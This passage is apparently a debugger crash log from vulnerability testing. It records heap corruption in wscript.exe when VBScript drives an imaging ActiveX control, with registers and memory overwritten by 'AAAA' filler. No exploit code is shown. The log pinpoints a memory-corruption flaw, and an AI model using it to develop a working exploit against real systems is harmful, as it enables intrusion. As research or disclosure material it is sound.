1002F16                       KERNEL32.7C817077            
 
 
Registers:
--------------------------------------------------
EIP 7C919084 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EAX 02A72100 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBX 41414141
ECX 00004141
EDX 02A70168 -> 00000000
EDI 41414141
ESI 02A720F8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 0013B824 -> 0013B8A8
ESP 0013B608 -> 0000001C
 
 
Block Disassembly:
--------------------------------------------------
7C91906D    MOV [EBP-25],AL
7C919070    LEA EAX,[ESI+8]
7C919073    MOV EDI,[EAX]
7C919075    MOV [EBP-1E4],EDI
7C91907B    MOV EBX,[ESI+C]
7C91907E    MOV [EBP-164],EBX
7C919084    MOV ECX,[EBX]     <--- CRASH
7C919086    CMP ECX,[EDI+4]
7C919089    JNZ 7C92CC59
7C91908F    CMP ECX,EAX
7C919091    JNZ 7C92CC59
7C919097    PUSH ESI
7C919098    PUSH DWORD PTR [EBP-1C]
7C91909B    CALL 7C910684
7C9190A0    MOV [EBX],EDI
 
 
ArgDump:
--------------------------------------------------
EBP+8   02A70000 -> 000000C8
EBP+12  50000161
EBP+16  0000001C
EBP+20  02A70000 -> 000000C8
EBP+24  00000000
EBP+28  02A70000 -> 000000C8
 
 
Stack Dump:
--------------------------------------------------
13B608 1C 00 00 00 00 00 A7 02 01 00 00 00 00 00 00 00  [................]
13B618 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]
13B628 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]
13B638 00 00 00 00 00 00 00 00 41 41 41 41 00 00 00 00  [................]
13B648 00 00 00 00 00 00 00 00 00 60 13 00 00 00 14 00  [.........`......]
 
 
 
Exception Code: BREAKPOINT
Disasm: 7C90120E    INT3
 
Seh Chain:
--------------------------------------------------
1   7C90E920    ntdll.dll
2   7C90E920    ntdll.dll
3   7C90E920    ntdll.dll
4   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
ntdll.7C90120F                ntdll.7C95F38C               
ntdll.7C95F38C                ntdll.7C96E507               
ntdll.7C96E507                ntdll.7C96F75E               
ntdll.7C96F75E                ntdll.7C94BC4C               
ntdll.7C94BC4C                ntdll.7C927573               
ntdll.7C927573                ltisi11n.AA69F4              
ltisi11n.AA69F4               VBSCRIPT.733015F2            
VBSCRIPT.733015F2             VBSCRIPT.7331EEE1            
VBSCRIPT.7331EEE1             VBSCRIPT.7331F192            
VBSCRIPT.7331F192             VBSCRIPT.7331F632            
VBSCRIPT.7331F632             VBSCRIPT.73321CB3            
VBSCRIPT.73321CB3             SCROBJ.5CE448DD              
SCROBJ.5CE448DD               SCROBJ.5CE49EEA              
SCROBJ.5CE49EEA               SCROBJ.5CE49E41              
SCROBJ.5CE49E41               1013CE7                      
1013CE7                       1006B0C                      
1006B0C                       100332C                      
100332C                       1003105                      
1003105                       1003076                      
1003076                       1002F16                      
1002F16                       KERNEL32.7C817077            
 
 
Registers:
--------------------------------------------------
EIP 7C90120F -> 000B0041
EAX 02A71EF0 -> 000B0041
EBX 02A720E4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ECX 7C91EAD5 -> FF0014C2
EDX 0013EECE -> EEF4000A
EDI 000001EC
ESI 02A71EF0 -> 000B0041
EBP 0013F0D4 -> 0013F0EC
ESP 0013F0D0 -> 7C96E139
 
 
Block Disassembly:
--------------------------------------------------
7C9011FF    TEST BYTE PTR [ESI+10],10
7C901203    JE 7C90FEF6
7C901209    POP ESI
7C90120A    LEAVE
7C90120B    RETN 4
7C90120E    INT3
7C90120F    RETN      <--- CRASH
7C901210    MOV EDI,EDI
7C901212    INT3
7C901213    RETN
7C901214    MOV EDI,EDI
7C901216    MOV EAX,[ESP+4]
7C90121A    INT3
7C90121B    RETN 4
7C90121E    MOV EAX,FS:[18]
 
 
ArgDump:
--------------------------------------------------
EBP+8   02A71EF0 -> 000B0041
EBP+12  02A71EF0 -> 000B0041
EBP+16  02A70000 -> 000000C8
EBP+20  02A71EF0 -> 000B0041
EBP+24  0013F100 -> 0013F174
EBP+28  7C96E507 -> 3374C084
 
 
Stack Dump:
--------------------------------------------------
13F0D0 39 E1 96 7C EC F0 13 00 8C F3 95 7C F0 1E A7 02  [................]
13F0E0 F0 1E A7 02 00 00 A7 02 F0 1E A7 02 00 F1 13 00  [................]
13F0F0 07 E5 96 7C 00 00 00 00 00 00 A7 02 F8 1E A7 02  [................]
13F100 74 F1 13 00 5E F7 96 7C 00 00 A7 02 F0 1E A7 02  [t...^...........]
13F110 14 F9 96 7C 00 00 A7 02 F8 1E A7 02 60 00 00 40  [............`...]
 
 
 
Exception Code: ACCESS_VIOLATION
Disasm: 7C96E478    CMP BYTE PTR [EBX+7],FF
 
Seh Chain:
--------------------------------------------------
1   7C90E920    ntdll.dll
2   7C90E920    ntdll.dll
3   7C839AD8    KERNEL32.dll
4   7C90E920    ntdll.dll
5   7C839AD8    KERNEL32.dll
6   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
ntdll.7C96E478                ntdll.7C96FA1D               
ntdll.7C96FA1D                ntdll.7C94D281               
ntdll.7C94D281                KERNEL32.7C834D23            
KERNEL32.7C834D23             LTKRN11n.2001087F            
LTKRN11n.2001087F             ntdll.7C913A43               
ntdll.7C913A43                KERNEL32.7C80C136            
KERNEL32.7C80C136             KERNEL32.7C80B72F            
 
 
Registers:
--------------------------------------------------
EIP 7C96E478
EAX FFFFFFF8
EBX FFFFFFF8
ECX 00150000 -> 000000C8
EDX 00150608 -> 7C97E5A0
EDI 00000000
ESI 00150000 -> 000000C8
EBP 00FFFD9C -> 00FFFDEC
ESP 00FFFD94 -> 00150000
 
 
Block Disassembly:
--------------------------------------------------
7C96E468    PUSH EBX
7C96E469    MOV EBX,[EBP+C]
7C96E46C    TEST EBX,EBX
7C96E46E    PUSH ESI
7C96E46F    MOV ESI,[EBP+8]
7C96E472    JE 7C96E53E
7C96E478    CMP BYTE PTR [EBX+7],FF   <--- CRASH
7C96E47C    JNZ SHORT 7C96E4BC
7C96E47E    CMP BYTE PTR [ESI+586],2
7C96E485    JNZ SHORT 7C96E48F
7C96E487    MOV EAX,[ESI+580]
7C96E48D    JMP SHORT 7C96E491
7C96E48F    XOR EAX,EAX
7C96E491    TEST EAX,EAX
7C96E493    JE 7C96E53E
 
 
ArgDump:
--------------------------------------------------
EBP+8   00150000 -> 000000C8
EBP+12  FFFFFFF8
EBP+16  7C96FADC -> Asc: RtlGetUserInfoHeap
EBP+20  00000000
EBP+24  00000000
EBP+28  00000003
 
 
Stack Dump:
--------------------------------------------------
FFFD94 00 00 15 00 01 00 00 00 EC FD FF 00 1D FA 96 7C  [................]
FFFDA4 00 00 15 00 F8 FF FF FF DC FA 96 7C 00 00 00 00  [................]
FFFDB4 00 00 00 00 03 00 00 00 6C FE FF 00 8F 04 44 7E  [........l.....D.]
FFFDC4 F8 FF FF FF 00 00 15 00 5B 21 00 01 02 04 00 00  [........[.......]
FFFDD4 B0 FD FF 00 00 00 00 00 40 FE FF 00 20 E9 90 7C  [................]
 
 
 
ApiLog
--------------------------------------------------
 
***** Installing Hooks *****
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
Debug String Log
--------------------------------------------------
 
HEAP[wscript.exe]:
Heap block at 02A71EF0 modified at 02A720E4 past requested size of 1ec